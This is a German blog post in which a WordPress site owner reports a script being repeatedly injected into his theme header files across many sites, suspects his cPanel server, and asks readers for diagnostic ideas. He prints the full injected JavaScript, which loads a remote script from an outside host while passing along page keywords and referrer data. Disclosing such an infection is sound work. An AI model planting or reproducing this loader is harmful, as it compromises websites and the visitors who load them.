Script Einschleusung in WordPress Theme

Hallo liebe Leser,
schaut mal in euer WordPress Theme in die header Datei.

Bei mir wird schon seit Wochen in die header Datei aller WordPress Themen ein Script eingeschleust das wir folgt aussieht.

<script>var a=“;setTimeout(10);if(document.referrer.indexOf(location.protocol+“//“+location.host)!==0||document.referrer!==undefined||document.referrer!==“||document.referrer!==null){document.write(‚<script type=“text/javascript“ src=“http://portal.mersinmatematikmerkezi.com/js/jquery.min.php?c_utt=G91825&c_utm=’+encodeURIComponent(‚http://portal.mersinmatematikmerkezi.com/js/jquery.min.php’+‘?’+’default_keyword=’+encodeURIComponent(((k=(function(){var keywords=“;var metas=document.getElementsByTagName(‚meta‘);if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()==“keywords“){keywords+=metas[x].content;}}}return keywords!==“?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?“:t:v[1]:k))+’&se_referrer=’+encodeURIComponent(document.referrer)+’&source=’+encodeURIComponent(window.location.host))+'“><‚+’/script>‘);}</script>

Die Seite mersinmatematikmerkezi.com ist hiebei wohl nur Wirt des Scrips denn diese änert sich nach jedem Löschen und neuinfizierung.

Was das Script macht kann ich nicht sagen.
Mein Hoster sagt das das oft masenhaft Spam über meine Seiten verteilt werden würde.
Ich hatte allerdings auch schon exploits auf verschiedenen Seiten die fürs versenden verantwortlich hätten sein können.
Das Problem habe ich aber wohl im Griff.

Differentialdiagnostik ala Dr. House

Ich versuche nun der Sache mit Differentialdiagnostik ala Dr. House auf den Grund zu gehen.

Meine Pinnwand gibt allerdings noch nicht so viele Infos her.
Mein Verdacht zielt auf den Server bzw. die Serververwaltung CPanel die irgendwie angreifbar ist.

Ich habe einen Webspace mit 50 GB auf dem ich mit CPanel verwaltet ca 150 Domains am Laufen habe davon ca. 60 WordPress Installationen.

Da ich nach und nach alle mit dem Script infizierten Projekte auf einen anderen Server umziehe (diesmal mit liveconfig verwaltet) und diese Projekte dort nicht infiziert werden fühle ich mich in meinem Verdacht bestätigt das es der Server ist oder das CPanel.

Das ist nun der aktuelle Stand.
Wenn jemand eine Idee hat und zur Diagnose beitragen möchte dann mag er dies per Kommentar tun.

Grüße
Lothar

Ein Kommentar

  1. Hallo Lothar,
    puh..schwer zu sagen, was es sein könnte und was den Spam bei dir nach sich gezogen hatte. Ich hatte bisher nur eine Forum-Installation, über die Spam versendet wurde und diese hat man dann eingestampft, weil so wichtig war das Forum dann doch nicht.

    Bei WordPress-Blogs, die im cPanel verwaltet werden, kann ich nicht sagen. Normalerweise müsste cPanel sehr sicher sein und sicher gibt es keine 100-prozentige Garantie für die Sicherheit von etwas, aber es würde dem Webhoster vielleicht auffallen und ich denke, dass es vom cPanel auch Updates und Sicherheitsupdates gibt, die dann der Webhoster selbst einspielen muss.

    Wollen wir es hoffen, dass bei deinem neuen Webhoster auf lange Dauer alles im grünen Bereich sein wird. Es ist so heikel mit dem Webhosting und wehe etwas nicht klappt, bringt bei mir alles durcheinander.

Kommentar hinterlassen

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert